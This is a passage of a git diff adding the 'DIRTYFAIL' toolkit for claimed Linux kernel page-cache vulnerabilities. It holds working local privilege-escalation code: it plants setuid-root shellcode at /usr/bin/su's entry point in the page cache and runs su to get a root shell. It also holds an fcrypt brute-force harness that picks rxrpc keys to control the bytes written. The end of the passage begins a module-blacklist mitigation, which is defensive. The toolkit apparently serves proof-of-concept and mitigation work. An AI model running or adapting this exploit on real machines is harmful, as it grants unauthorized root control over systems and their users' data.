*/ + setvbuf(stdin, NULL, _IONBF, 0); + + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined"); + return DF_OK; + } + + if (!save_original(target, entry_off)) return DF_TEST_ERROR; + + if (!plant_shellcode(target, entry_off, shellcode, SHELLCODE_LEN)) { + log_warn("plant failed mid-stream β€” attempting revert"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + unlink(STATE_PATH); + } + return DF_EXPLOIT_FAIL; + } + + if (!verify_plant(target, entry_off, shellcode, SHELLCODE_LEN)) { + log_bad("verify: page cache does not match planted shellcode " + "(kernel likely patched, or AF_ALG/algif_aead blocked)"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + unlink(STATE_PATH); + } + return DF_EXPLOIT_FAIL; + } + log_ok("page cache of %s now contains shellcode at entry point", target); + + if (!do_shell) { + log_step("--no-shell: reverting via DONTNEED+rewrite"); + struct su_state st_in; + if (load_state(&st_in) && + try_revert_su_pages(target, entry_off, st_in.original, SHELLCODE_LEN)) { + log_ok("page cache reverted successfully"); + unlink(STATE_PATH); + } else { + log_warn("revert may have failed β€” run `sudo dirtyfail --cleanup-su` " + "or reboot before using su again"); + } + return DF_EXPLOIT_OK; + } + + log_ok("invoking %s β€” kernel will exec setuid-root, jump to our shellcode, " + "and drop a /bin/sh root shell", target); + log_hint("when you exit the shell, run `sudo dirtyfail --cleanup-su` to " + "restore /usr/bin/su (or reboot β€” page cache is RAM-only)"); + execl(target, "su", (char *)NULL); + log_bad("execl: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* Describe state file if present, for `--list-state`. Returns true if + * an exploit-su state file was found and described, false if absent. + * Silent when file is missing (the normal case). 
*/ +bool exploit_su_list_state(void) +{ + struct stat ignored; + if (stat(STATE_PATH, &ignored) < 0) return false; /* clean state */ + struct su_state st_in; + if (!load_state(&st_in)) return false; + log_warn("/usr/bin/su shellcode planted β€” state file %s", STATE_PATH); + log_hint(" target: %s, entry-point file offset: 0x%llx", + st_in.target_path, (unsigned long long)st_in.file_offset); + log_hint(" original %llu bytes stashed.", + (unsigned long long)st_in.original_len); + log_hint(" the page cache currently has x86_64 setuid+execve(/bin/sh)"); + log_hint(" shellcode in place of the above. Revert with `--cleanup-su`."); + return true; +} + +df_result_t cleanup_su_shellcode(void) +{ + log_step("--cleanup-su: restore /usr/bin/su entry-point bytes from %s", + STATE_PATH); + + struct su_state st_in; + if (!load_state(&st_in)) return DF_TEST_ERROR; + + log_hint("target: %s, file_offset: 0x%llx", st_in.target_path, + (unsigned long long)st_in.file_offset); + + if (!try_revert_su_pages(st_in.target_path, (off_t)st_in.file_offset, + st_in.original, SHELLCODE_LEN)) { + log_bad("revert failed β€” manual fix needed: " + "`echo 3 | sudo tee /proc/sys/vm/drop_caches`"); + return DF_TEST_ERROR; + } + + if (unlink(STATE_PATH) == 0) { + log_ok("page cache restored and state file removed"); + } else { + log_warn("page cache restored but %s could not be removed: %s", + STATE_PATH, strerror(errno)); + } + return DF_OK; +} + +#else /* !__linux__ */ + +df_result_t exploit_su_shellcode(bool do_shell) +{ + (void)do_shell; + return DF_TEST_ERROR; +} + +df_result_t cleanup_su_shellcode(void) +{ + return DF_TEST_ERROR; +} + +bool exploit_su_list_state(void) +{ + return false; +} + +#endif diff --git a/modules/copy_fail_family/exploit_su.h b/modules/copy_fail_family/exploit_su.h new file mode 100644 index 0000000..c3650c5 --- /dev/null +++ b/modules/copy_fail_family/exploit_su.h @@ -0,0 +1,56 @@ +/* + * DIRTYFAIL β€” exploit_su.h + * + * V4bel-style page-cache shellcode injection 
against /usr/bin/su. + * + * Different chain than the /etc/passwd UID-flip exploits: + * - Targets /usr/bin/su's ELF entry point in the page cache + * - Plants ~48 bytes of x86_64 shellcode (setuid(0); setgid(0); + * execve("/bin/sh")) via 12 chained 4-byte writes + * - When /usr/bin/su is exec'd, kernel sets euid=0 (setuid bit on + * disk, unaffected by page-cache mods), dynamic linker resolves, + * control transfers to entry point β†’ our shellcode β†’ /bin/sh + * + * Mitigation profile vs. /etc/passwd flip: + * + Bypasses `pam_unix nullok` removal β€” no PAM dependency at all + * + Works even if password rotation policy enforces complex passwords + * - Crashes /usr/bin/su system-wide if shellcode is wrong (until + * drop_caches or reboot) + * - Stash-and-revert is the safety net: cleanup-su restores the + * original 48 bytes from /var/tmp/.dirtyfail-su.state. + * + * Architecture: x86_64 only for now. The shellcode is hardcoded for + * the SYSV amd64 syscall ABI. arm64/aarch64 would need a different + * shellcode blob and possibly a different entry-point fixup. + * + * Reference: V4bel/dirtyfrag's xfrm-ESP variant uses the same target + * file pattern with a different (4-byte) primitive. Theori's Xint + * disclosure uses /usr/bin/su as the canonical target. + */ + +#ifndef DIRTYFAIL_EXPLOIT_SU_H +#define DIRTYFAIL_EXPLOIT_SU_H + +#include "common.h" + +/* End-to-end PoC: locate /usr/bin/su (or DIRTYFAIL_SU_PATH override), + * stash original entry-point bytes, plant shellcode, verify, and + * (if do_shell) invoke `su -` so the kernel exec's our hijacked + * /usr/bin/su as setuid root β†’ shellcode runs β†’ /bin/sh. + * + * `do_shell=false` runs the plant + verify + revert sequence β€” useful + * for testing the primitive without leaving the system in a broken + * state (su would otherwise be unusable until drop_caches). 
*/ +df_result_t exploit_su_shellcode(bool do_shell); + +/* Restore /usr/bin/su's original entry-point bytes from + * /var/tmp/.dirtyfail-su.state and drop_caches to evict the modified + * page. Returns DF_OK on success, DF_TEST_ERROR if state file is + * missing or the on-disk file no longer matches. */ +df_result_t cleanup_su_shellcode(void); + +/* Used by --list-state. Returns true if /var/tmp/.dirtyfail-su.state + * is present (and prints a summary), false if absent. Side-effect free. */ +bool exploit_su_list_state(void); + +#endif diff --git a/modules/copy_fail_family/fcrypt.c b/modules/copy_fail_family/fcrypt.c new file mode 100644 index 0000000..973ef18 --- /dev/null +++ b/modules/copy_fail_family/fcrypt.c @@ -0,0 +1,303 @@ +/* + * DIRTYFAIL β€” fcrypt.c + * + * Implementation of the rxkad fcrypt block cipher and a user-space + * brute-force search loop. + * + * ATTRIBUTION + * ----------- + * The four 256-byte S-box tables (`SBOX0_RAW` … `SBOX3_RAW`) and the + * 8-byte β†’ 56-bit key packing + 11-bit rotation key schedule are the + * standard rxkad / fcrypt protocol constants, also present in the + * Linux kernel `crypto/fcrypt.c` (GPL-2.0, David Howells / KTH). + * + * The implementation code below β€” table preprocessing, round-key + * struct, brute-force harness, predicates β€” is fresh DIRTYFAIL code. + * The cipher tables themselves are protocol facts; using them is what + * makes interoperability with the kernel possible. + * + * See NOTICE.md. + * + * SELF-TEST VECTORS (from the kernel test suite): + * K = 00 00 00 00 00 00 00 00 β†’ decrypt(0E0900C73EF7ED41) = 00000000 00000000 + * K = 11 44 ?? ?? ?? ?? ?? 66 β†’ decrypt(D8ED787477EC0680) = 12345678 9ABCDEF0 + */ + +#include "fcrypt.h" + +#include /* htonl == htonl, portable */ +#include +#include + +/* -------- raw S-box bytes ------------------------------------------------ * + * + * These are the rxkad protocol S-boxes, exactly as specified. 
+ * They are pre-shifted into 32-bit form by fcrypt_init() so the inner + * round function (FF) is just four XORs of 32-bit lookups. + */ + +static const uint8_t SBOX0_RAW[256] = { + 0xea,0x7f,0xb2,0x64,0x9d,0xb0,0xd9,0x11,0xcd,0x86,0x86,0x91,0x0a,0xb2,0x93,0x06, + 0x0e,0x06,0xd2,0x65,0x73,0xc5,0x28,0x60,0xf2,0x20,0xb5,0x38,0x7e,0xda,0x9f,0xe3, + 0xd2,0xcf,0xc4,0x3c,0x61,0xff,0x4a,0x4a,0x35,0xac,0xaa,0x5f,0x2b,0xbb,0xbc,0x53, + 0x4e,0x9d,0x78,0xa3,0xdc,0x09,0x32,0x10,0xc6,0x6f,0x66,0xd6,0xab,0xa9,0xaf,0xfd, + 0x3b,0x95,0xe8,0x34,0x9a,0x81,0x72,0x80,0x9c,0xf3,0xec,0xda,0x9f,0x26,0x76,0x15, + 0x3e,0x55,0x4d,0xde,0x84,0xee,0xad,0xc7,0xf1,0x6b,0x3d,0xd3,0x04,0x49,0xaa,0x24, + 0x0b,0x8a,0x83,0xba,0xfa,0x85,0xa0,0xa8,0xb1,0xd4,0x01,0xd8,0x70,0x64,0xf0,0x51, + 0xd2,0xc3,0xa7,0x75,0x8c,0xa5,0x64,0xef,0x10,0x4e,0xb7,0xc6,0x61,0x03,0xeb,0x44, + 0x3d,0xe5,0xb3,0x5b,0xae,0xd5,0xad,0x1d,0xfa,0x5a,0x1e,0x33,0xab,0x93,0xa2,0xb7, + 0xe7,0xa8,0x45,0xa4,0xcd,0x29,0x63,0x44,0xb6,0x69,0x7e,0x2e,0x62,0x03,0xc8,0xe0, + 0x17,0xbb,0xc7,0xf3,0x3f,0x36,0xba,0x71,0x8e,0x97,0x65,0x60,0x69,0xb6,0xf6,0xe6, + 0x6e,0xe0,0x81,0x59,0xe8,0xaf,0xdd,0x95,0x22,0x99,0xfd,0x63,0x19,0x74,0x61,0xb1, + 0xb6,0x5b,0xae,0x54,0xb3,0x70,0xff,0xc6,0x3b,0x3e,0xc1,0xd7,0xe1,0x0e,0x76,0xe5, + 0x36,0x4f,0x59,0xc7,0x08,0x6e,0x82,0xa6,0x93,0xc4,0xaa,0x26,0x49,0xe0,0x21,0x64, + 0x07,0x9f,0x64,0x81,0x9c,0xbf,0xf9,0xd1,0x43,0xf8,0xb6,0xb9,0xf1,0x24,0x75,0x03, + 0xe4,0xb0,0x99,0x46,0x3d,0xf5,0xd1,0x39,0x72,0x12,0xf6,0xba,0x0c,0x0d,0x42,0x2e, +}; + +static const uint8_t SBOX1_RAW[256] = { + 0x77,0x14,0xa6,0xfe,0xb2,0x5e,0x8c,0x3e,0x67,0x6c,0xa1,0x0d,0xc2,0xa2,0xc1,0x85, + 0x6c,0x7b,0x67,0xc6,0x23,0xe3,0xf2,0x89,0x50,0x9c,0x03,0xb7,0x73,0xe6,0xe1,0x39, + 0x31,0x2c,0x27,0x9f,0xa5,0x69,0x44,0xd6,0x23,0x83,0x98,0x7d,0x3c,0xb4,0x2d,0x99, + 0x1c,0x1f,0x8c,0x20,0x03,0x7c,0x5f,0xad,0xf4,0xfa,0x95,0xca,0x76,0x44,0xcd,0xb6, + 0xb8,0xa1,0xa1,0xbe,0x9e,0x54,0x8f,0x0b,0x16,0x74,0x31,0x8a,0x23,0x17,0x04,0xfa, + 
0x79,0x84,0xb1,0xf5,0x13,0xab,0xb5,0x2e,0xaa,0x0c,0x60,0x6b,0x5b,0xc4,0x4b,0xbc, + 0xe2,0xaf,0x45,0x73,0xfa,0xc9,0x49,0xcd,0x00,0x92,0x7d,0x97,0x7a,0x18,0x60,0x3d, + 0xcf,0x5b,0xde,0xc6,0xe2,0xe6,0xbb,0x8b,0x06,0xda,0x08,0x15,0x1b,0x88,0x6a,0x17, + 0x89,0xd0,0xa9,0xc1,0xc9,0x70,0x6b,0xe5,0x43,0xf4,0x68,0xc8,0xd3,0x84,0x28,0x0a, + 0x52,0x66,0xa3,0xca,0xf2,0xe3,0x7f,0x7a,0x31,0xf7,0x88,0x94,0x5e,0x9c,0x63,0xd5, + 0x24,0x66,0xfc,0xb3,0x57,0x25,0xbe,0x89,0x44,0xc4,0xe0,0x8f,0x23,0x3c,0x12,0x52, + 0xf5,0x1e,0xf4,0xcb,0x18,0x33,0x1f,0xf8,0x69,0x10,0x9d,0xd3,0xf7,0x28,0xf8,0x30, + 0x05,0x5e,0x32,0xc0,0xd5,0x19,0xbd,0x45,0x8b,0x5b,0xfd,0xbc,0xe2,0x5c,0xa9,0x96, + 0xef,0x70,0xcf,0xc2,0x2a,0xb3,0x61,0xad,0x80,0x48,0x81,0xb7,0x1d,0x43,0xd9,0xd7, + 0x45,0xf0,0xd8,0x8a,0x59,0x7c,0x57,0xc1,0x79,0xc7,0x34,0xd6,0x43,0xdf,0xe4,0x78, + 0x16,0x06,0xda,0x92,0x76,0x51,0xe1,0xd4,0x70,0x03,0xe0,0x2f,0x96,0x91,0x82,0x80, +}; + +static const uint8_t SBOX2_RAW[256] = { + 0xf0,0x37,0x24,0x53,0x2a,0x03,0x83,0x86,0xd1,0xec,0x50,0xf0,0x42,0x78,0x2f,0x6d, + 0xbf,0x80,0x87,0x27,0x95,0xe2,0xc5,0x5d,0xf9,0x6f,0xdb,0xb4,0x65,0x6e,0xe7,0x24, + 0xc8,0x1a,0xbb,0x49,0xb5,0x0a,0x7d,0xb9,0xe8,0xdc,0xb7,0xd9,0x45,0x20,0x1b,0xce, + 0x59,0x9d,0x6b,0xbd,0x0e,0x8f,0xa3,0xa9,0xbc,0x74,0xa6,0xf6,0x7f,0x5f,0xb1,0x68, + 0x84,0xbc,0xa9,0xfd,0x55,0x50,0xe9,0xb6,0x13,0x5e,0x07,0xb8,0x95,0x02,0xc0,0xd0, + 0x6a,0x1a,0x85,0xbd,0xb6,0xfd,0xfe,0x17,0x3f,0x09,0xa3,0x8d,0xfb,0xed,0xda,0x1d, + 0x6d,0x1c,0x6c,0x01,0x5a,0xe5,0x71,0x3e,0x8b,0x6b,0xbe,0x29,0xeb,0x12,0x19,0x34, + 0xcd,0xb3,0xbd,0x35,0xea,0x4b,0xd5,0xae,0x2a,0x79,0x5a,0xa5,0x32,0x12,0x7b,0xdc, + 0x2c,0xd0,0x22,0x4b,0xb1,0x85,0x59,0x80,0xc0,0x30,0x9f,0x73,0xd3,0x14,0x48,0x40, + 0x07,0x2d,0x8f,0x80,0x0f,0xce,0x0b,0x5e,0xb7,0x5e,0xac,0x24,0x94,0x4a,0x18,0x15, + 0x05,0xe8,0x02,0x77,0xa9,0xc7,0x40,0x45,0x89,0xd1,0xea,0xde,0x0c,0x79,0x2a,0x99, + 0x6c,0x3e,0x95,0xdd,0x8c,0x7d,0xad,0x6f,0xdc,0xff,0xfd,0x62,0x47,0xb3,0x21,0x8a, + 
0xec,0x8e,0x19,0x18,0xb4,0x6e,0x3d,0xfd,0x74,0x54,0x1e,0x04,0x85,0xd8,0xbc,0x1f, + 0x56,0xe7,0x3a,0x56,0x67,0xd6,0xc8,0xa5,0xf3,0x8e,0xde,0xae,0x37,0x49,0xb7,0xfa, + 0xc8,0xf4,0x1f,0xe0,0x2a,0x9b,0x15,0xd1,0x34,0x0e,0xb5,0xe0,0x44,0x78,0x84,0x59, + 0x56,0x68,0x77,0xa5,0x14,0x06,0xf5,0x2f,0x8c,0x8a,0x73,0x80,0x76,0xb4,0x10,0x86, +}; + +static const uint8_t SBOX3_RAW[256] = { + 0xa9,0x2a,0x48,0x51,0x84,0x7e,0x49,0xe2,0xb5,0xb7,0x42,0x33,0x7d,0x5d,0xa6,0x12, + 0x44,0x48,0x6d,0x28,0xaa,0x20,0x6d,0x57,0xd6,0x6b,0x5d,0x72,0xf0,0x92,0x5a,0x1b, + 0x53,0x80,0x24,0x70,0x9a,0xcc,0xa7,0x66,0xa1,0x01,0xa5,0x41,0x97,0x41,0x31,0x82, + 0xf1,0x14,0xcf,0x53,0x0d,0xa0,0x10,0xcc,0x2a,0x7d,0xd2,0xbf,0x4b,0x1a,0xdb,0x16, + 0x47,0xf6,0x51,0x36,0xed,0xf3,0xb9,0x1a,0xa7,0xdf,0x29,0x43,0x01,0x54,0x70,0xa4, + 0xbf,0xd4,0x0b,0x53,0x44,0x60,0x9e,0x23,0xa1,0x18,0x68,0x4f,0xf0,0x2f,0x82,0xc2, + 0x2a,0x41,0xb2,0x42,0x0c,0xed,0x0c,0x1d,0x13,0x3a,0x3c,0x6e,0x35,0xdc,0x60,0x65, + 0x85,0xe9,0x64,0x02,0x9a,0x3f,0x9f,0x87,0x96,0xdf,0xbe,0xf2,0xcb,0xe5,0x6c,0xd4, + 0x5a,0x83,0xbf,0x92,0x1b,0x94,0x00,0x42,0xcf,0x4b,0x00,0x75,0xba,0x8f,0x76,0x5f, + 0x5d,0x3a,0x4d,0x09,0x12,0x08,0x38,0x95,0x17,0xe4,0x01,0x1d,0x4c,0xa9,0xcc,0x85, + 0x82,0x4c,0x9d,0x2f,0x3b,0x66,0xa1,0x34,0x10,0xcd,0x59,0x89,0xa5,0x31,0xcf,0x05, + 0xc8,0x84,0xfa,0xc7,0xba,0x4e,0x8b,0x1a,0x19,0xf1,0xa1,0x3b,0x18,0x12,0x17,0xb0, + 0x98,0x8d,0x0b,0x23,0xc3,0x3a,0x2d,0x20,0xdf,0x13,0xa0,0xa8,0x4c,0x0d,0x6c,0x2f, + 0x47,0x13,0x13,0x52,0x1f,0x2d,0xf5,0x79,0x3d,0xa2,0x54,0xbd,0x69,0xc8,0x6b,0xf3, + 0x05,0x28,0xf1,0x16,0x46,0x40,0xb0,0x11,0xd3,0xb7,0x95,0x49,0xcf,0xc3,0x1d,0x8f, + 0xd8,0xe1,0x73,0xdb,0xad,0xc8,0xc9,0xa9,0xa1,0xc2,0xc5,0xe3,0xba,0xfc,0x0e,0x25, +}; + +/* -------- preprocessed 32-bit S-boxes ----------------------------------- * + * + * The round function does ROUND_KEY ^ HALF_BLOCK then four S-box lookups + * combined by XOR. 
To make this fast we pre-rotate the S-box outputs + * into the four byte lanes: + * + * sbox0[b] = b (low byte lane) + * sbox1[b] = (b & 0x1f) << 5 in the LOW byte, b >> 5 in the SECOND byte + * (rotation by 8-3=5 bits within a 32-bit big-endian view) + * sbox2[b] = b << 11 + * sbox3[b] = b << 19 + * + * After all four are XORed, we get the round-function output directly + * in big-endian order, ready to XOR into the other half-block. + */ + +static uint32_t SBOX0[256], SBOX1[256], SBOX2[256], SBOX3[256]; + +void fcrypt_init(void) +{ + for (int i = 0; i < 256; i++) { + SBOX0[i] = htonl((uint32_t)SBOX0_RAW[i] << 3); + SBOX1[i] = htonl(((uint32_t)(SBOX1_RAW[i] & 0x1f) << 27) | + ((uint32_t)SBOX1_RAW[i] >> 5)); + SBOX2[i] = htonl((uint32_t)SBOX2_RAW[i] << 11); + SBOX3[i] = htonl((uint32_t)SBOX3_RAW[i] << 19); + } +} + +/* -------- key schedule -------------------------------------------------- * + * + * The key is 8 bytes but only the high 7 bits of each byte are used β€” + * this is the standard 56-bit key with the low bit of each byte serving + * as parity in the AFS rxkad token format. We pack: + * + * k_56 = (key[0]>>1) || (key[1]>>1) || ... || (key[7]>>1) (56 bits) + * + * Then derive 16 round keys by emitting the low 32 bits of k_56 and + * rotating right by 11 bits between each: + * + * round_key[0] = k_56[0..31] + * k_56 = ROR_56(k_56, 11) + * round_key[1] = k_56[0..31] + * ... + * round_key[15] = k_56[0..31] (no rotation after the last) + */ + +#define ROR56_11(k) \ + ((k) = ((k) >> 11) | (((k) & ((1ULL << 11) - 1)) << (56 - 11))) + +void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]) +{ + uint64_t k = 0; + for (int i = 0; i < 8; i++) { + k = (k << 7) | (uint64_t)(key[i] >> 1); + } + /* k is now 56 bits in the low order of a uint64_t. 
*/ + for (int i = 0; i < 16; i++) { + ctx->round_key[i] = htonl((uint32_t)k); + if (i < 15) ROR56_11(k); + } +} + +/* -------- decrypt ------------------------------------------------------- * + * + * Standard 16-round Feistel decrypt with reversed round-key order. + * The round function FF mixes the round key into one half-block, splits + * into 4 bytes, and XORs the four S-box outputs into the other half. + */ + +#define FF(R_, L_, k_) do { \ + union { uint32_t w; uint8_t b[4]; } u; \ + u.w = (k_) ^ (R_); \ + (L_) ^= SBOX0[u.b[0]] ^ SBOX1[u.b[1]] ^ SBOX2[u.b[2]] ^ SBOX3[u.b[3]]; \ +} while (0) + +void fcrypt_decrypt(const fcrypt_ctx *ctx, + uint8_t out[8], const uint8_t in[8]) +{ + uint32_t L, R; + memcpy(&L, in, 4); + memcpy(&R, in + 4, 4); + + FF(L, R, ctx->round_key[0xf]); + FF(R, L, ctx->round_key[0xe]); + FF(L, R, ctx->round_key[0xd]); + FF(R, L, ctx->round_key[0xc]); + FF(L, R, ctx->round_key[0xb]); + FF(R, L, ctx->round_key[0xa]); + FF(L, R, ctx->round_key[0x9]); + FF(R, L, ctx->round_key[0x8]); + FF(L, R, ctx->round_key[0x7]); + FF(R, L, ctx->round_key[0x6]); + FF(L, R, ctx->round_key[0x5]); + FF(R, L, ctx->round_key[0x4]); + FF(L, R, ctx->round_key[0x3]); + FF(R, L, ctx->round_key[0x2]); + FF(L, R, ctx->round_key[0x1]); + FF(R, L, ctx->round_key[0x0]); + + memcpy(out, &L, 4); + memcpy(out + 4, &R, 4); +} + +/* -------- self-test ----------------------------------------------------- */ + +bool fcrypt_selftest(void) +{ + fcrypt_ctx ctx; + uint8_t out[8]; + + /* Vector 1: all-zero key. Catches gross structural bugs but the + * key schedule produces all-zero round keys, so it can't catch + * subtle bugs in the 7-bit packing or 11-bit rotation. 
*/ + static const uint8_t k1[8] = {0,0,0,0,0,0,0,0}; + static const uint8_t c1[8] = {0x0E,0x09,0x00,0xC7,0x3E,0xF7,0xED,0x41}; + fcrypt_setkey(&ctx, k1); + fcrypt_decrypt(&ctx, out, c1); + if (memcmp(out, "\x00\x00\x00\x00\x00\x00\x00\x00", 8) != 0) + return false; + + /* Vector 2: non-zero key, exercises every byte of the key schedule + * and round-key emit. Pulled from the kernel's crypto/testmgr.h + * fcrypt-pcbc test vector. */ + static const uint8_t k2[8] = {0x11,0x44,0x77,0xAA,0xDD,0x00,0x33,0x66}; + static const uint8_t c2[8] = {0xD8,0xED,0x78,0x74,0x77,0xEC,0x06,0x80}; + static const uint8_t p2[8] = {0x12,0x34,0x56,0x78,0x9A,0xBC,0xDE,0xF0}; + fcrypt_setkey(&ctx, k2); + fcrypt_decrypt(&ctx, out, c2); + if (memcmp(out, p2, 8) != 0) + return false; + + return true; +} + +/* -------- brute-force harness ------------------------------------------- * + * + * splitmix64 β€” fast, statistically decent generator with no library + * dependency. Plenty for a "scan a 56-bit subspace until I hit a + * predicate" loop. Each call advances the seed and returns a 64-bit + * pseudorandom value, which we treat as the 8-byte candidate key. 
+ */ + +static uint64_t splitmix64(uint64_t *s) +{ + uint64_t z = (*s += 0x9E3779B97F4A7C15ULL); + z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL; + z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL; + return z ^ (z >> 31); +} + +bool fcrypt_brute_force(const uint8_t ciphertext[8], + fcrypt_pred_fn predicate, + uint64_t max_iters, + uint64_t seed, + const char *label, + uint8_t key_out[8], + uint8_t plaintext_out[8]) +{ + fcrypt_ctx ctx; + uint8_t k[8], p[8]; + struct timespec t0, t1; + clock_gettime(CLOCK_MONOTONIC, &t0); + + for (uint64_t i = 0; i < max_iters; i++) { + uint64_t r = splitmix64(&seed); + memcpy(k, &r, 8); + fcrypt_setkey(&ctx, k); + fcrypt_decrypt(&ctx, p, ciphertext); + if (predicate(p)) { + clock_gettime(CLOCK_MONOTONIC, &t1); + double dt = (t1.tv_sec - t0.tv_sec) + + (t1.tv_nsec - t0.tv_nsec) / 1e9; + log_ok("%s found after %llu iters in %.2fs (%.2f Mops/s)", + label, (unsigned long long)i, dt, + (i + 1) / dt / 1e6); + memcpy(key_out, k, 8); + memcpy(plaintext_out, p, 8); + return true; + } + } + + clock_gettime(CLOCK_MONOTONIC, &t1); + double dt = (t1.tv_sec - t0.tv_sec) + + (t1.tv_nsec - t0.tv_nsec) / 1e9; + log_bad("%s exhausted %llu iters in %.2fs without a hit β€” predicate too strict?", + label, (unsigned long long)max_iters, dt); + return false; +} diff --git a/modules/copy_fail_family/fcrypt.h b/modules/copy_fail_family/fcrypt.h new file mode 100644 index 0000000..5a76bc5 --- /dev/null +++ b/modules/copy_fail_family/fcrypt.h @@ -0,0 +1,68 @@ +/* + * DIRTYFAIL β€” fcrypt.h + * + * fcrypt is the Andrew File System (AFS) rxkad cipher: 56-bit key, + * 8-byte block, 16-round Feistel structure with four 256-entry S-boxes. + * It is *deterministic*, with a public algorithm specification β€” its + * key space (2^56) is small enough that targeted decryption can be + * brute-forced in user space at ~15-20 M ops / second on a single core. 
+ * + * That property is what makes the RxRPC variant of Dirty Frag + * (CVE-2026-43500) practical: the in-place 8-byte STORE is + * fcrypt_decrypt(C, K), where C is the ciphertext at the target file + * offset and K is the session key the attacker registers via + * add_key("rxrpc", ...). For each STORE position we want, we run the + * fcrypt brute force locally until we find a K such that the resulting + * 8-byte plaintext matches our predicate (e.g. starts with "::"). + * + * License: see NOTICE.md. The S-box constants are the rxkad protocol + * tables (also present in the Linux kernel's crypto/fcrypt.c, GPL-2.0, + * David Howells / KTH). + */ + +#ifndef DIRTYFAIL_FCRYPT_H +#define DIRTYFAIL_FCRYPT_H + +#include "common.h" + +typedef struct { + uint32_t round_key[16]; /* big-endian, derived in fcrypt_setkey */ +} fcrypt_ctx; + +/* Initialize the global S-box tables. Call once before any other fcrypt_*. */ +void fcrypt_init(void); + +/* Run the kernel test vectors and return true if they match. Use this + * during exploit setup to fail fast on a broken build. */ +bool fcrypt_selftest(void); + +/* Derive the 16 round keys from an 8-byte key (only the high 7 bits of + * each byte are used; bit 0 of each byte is parity in the rxkad token + * format). */ +void fcrypt_setkey(fcrypt_ctx *ctx, const uint8_t key[8]); + +/* Decrypt a single 8-byte block. */ +void fcrypt_decrypt(const fcrypt_ctx *ctx, + uint8_t out[8], const uint8_t in[8]); + +/* Brute-force search predicate: given an 8-byte candidate plaintext, + * return true if it satisfies the constraints we want at this STORE + * position. */ +typedef bool (*fcrypt_pred_fn)(const uint8_t plaintext[8]); + +/* Search for an 8-byte key K such that fcrypt_decrypt(C, K) satisfies + * `predicate`. Returns true and fills K and the resulting plaintext on + * hit; returns false after `max_iters` non-hits. 
+ *
+ * `seed` selects the search starting point (deterministic via splitmix64);
+ * pass time(NULL) for randomness across runs, or a fixed value for
+ * reproducibility. `label` is logged on hit/timeout for clarity. */
+bool fcrypt_brute_force(const uint8_t ciphertext[8],
+                        fcrypt_pred_fn predicate,
+                        uint64_t max_iters,
+                        uint64_t seed,
+                        const char *label,
+                        uint8_t key_out[8],
+                        uint8_t plaintext_out[8]);
+
+#endif
diff --git a/modules/copy_fail_family/mitigate.c b/modules/copy_fail_family/mitigate.c
new file mode 100644
index 0000000..eab4dad
--- /dev/null
+++ b/modules/copy_fail_family/mitigate.c
@@ -0,0 +1,279 @@
+/*
+ * DIRTYFAIL — mitigate.c — defensive deployment
+ *
+ * See mitigate.h for the design.
+ */
+
+#include "mitigate.h"
+
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define MODPROBE_CONF "/etc/modprobe.d/dirtyfail-mitigations.conf"
+#define SYSCTL_CONF "/etc/sysctl.d/99-dirtyfail-mitigations.conf"
+#define AA_USERNS_SYSCTL "/proc/sys/kernel/apparmor_restrict_unprivileged_userns"
+
+/* Modules to blacklist. Each is the kernel module name + reason.
+ * authencesn is listed after esp4/esp6 so that, when unloading in table
+ * order, the modules that may hold a reference on it go first. */
+static const struct {
+    const char *name;
+    const char *reason;
+} BLACKLIST[] = {
+    {"algif_aead", "Copy Fail (CVE-2026-31431) — authencesn page-cache STORE primitive"},
+    {"esp4",       "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv4 path"},
+    {"esp6",       "Dirty Frag (CVE-2026-43284) — xfrm-ESP IPv6 path"},
+    {"authencesn", "Copy Fail (CVE-2026-31431) — AEAD template counted by tools/dirtyfail-check.sh"},
+    {"rxrpc",      "Dirty Frag (CVE-2026-43500) — RxRPC pcbc(fcrypt) path"},
+    {NULL, NULL},
+};
+
+/* Write `content` to `path` (created/truncated, mode 0644).
+ * Retries short writes and EINTR. Returns true on success; on failure
+ * returns false with errno describing the first error, preserved across
+ * close() so callers can report it with strerror(). */
+static bool write_file(const char *path, const char *content)
+{
+    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
+    if (fd < 0) return false;
+
+    const char *cur = content;
+    size_t left = strlen(content);
+    int err = 0;
+    while (left > 0) {
+        ssize_t got = write(fd, cur, left);
+        if (got < 0 && errno == EINTR) continue;
+        if (got <= 0) {
+            err = (got < 0) ? errno : EIO;
+            break;
+        }
+        cur += got;
+        left -= (size_t)got;
+    }
+    if (close(fd) < 0 && err == 0) err = errno;
+
+    if (err != 0) {
+        errno = err;
+        return false;
+    }
+    return true;
+}
+
+/* Refuse to run without euid 0; logs the reason when refusing. */
+static bool require_root(void)
+{
+    if (geteuid() != 0) {
+        log_bad("mitigate requires root — re-run as `sudo dirtyfail --mitigate`");
+        return false;
+    }
+    return true;
+}
+
+/* Unload `name` via the system shell if lsmod lists it, printing the
+ * outcome on stdout. Returns 0 if the module wasn't loaded or the
+ * unload succeeded; 1 if the unload failed or the shell could not run. */
+static int rmmod_if_loaded(const char *name)
+{
+    char cmd[512];
+    int len = snprintf(cmd, sizeof(cmd),
+        "if lsmod | grep -q '^%s '; then "
+        "  if rmmod %s 2>/dev/null; then echo unloaded; "
+        "  else echo \"unload failed (in use?)\"; exit 1; fi; "
+        "else "
+        "  echo \"not loaded\"; "
+        "fi", name, name);
+    if (len < 0 || (size_t)len >= sizeof(cmd)) {
+        puts("skipped (module name too long)");
+        return 1;
+    }
+
+    /* `exit 1` on the failure branch is what lets the shell's exit status
+     * (and therefore our return value) reflect the rmmod result. */
+    int status = system(cmd);
+    return (status != -1 && WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : 1;
+}
+
+/* Step 1: render and write the modprobe.d blacklist. Returns false with
+ * errno set if the text does not fit the buffer or the write fails. */
+static bool write_modprobe_blacklist(void)
+{
+    char buf[2048];
+    int n = snprintf(buf, sizeof(buf),
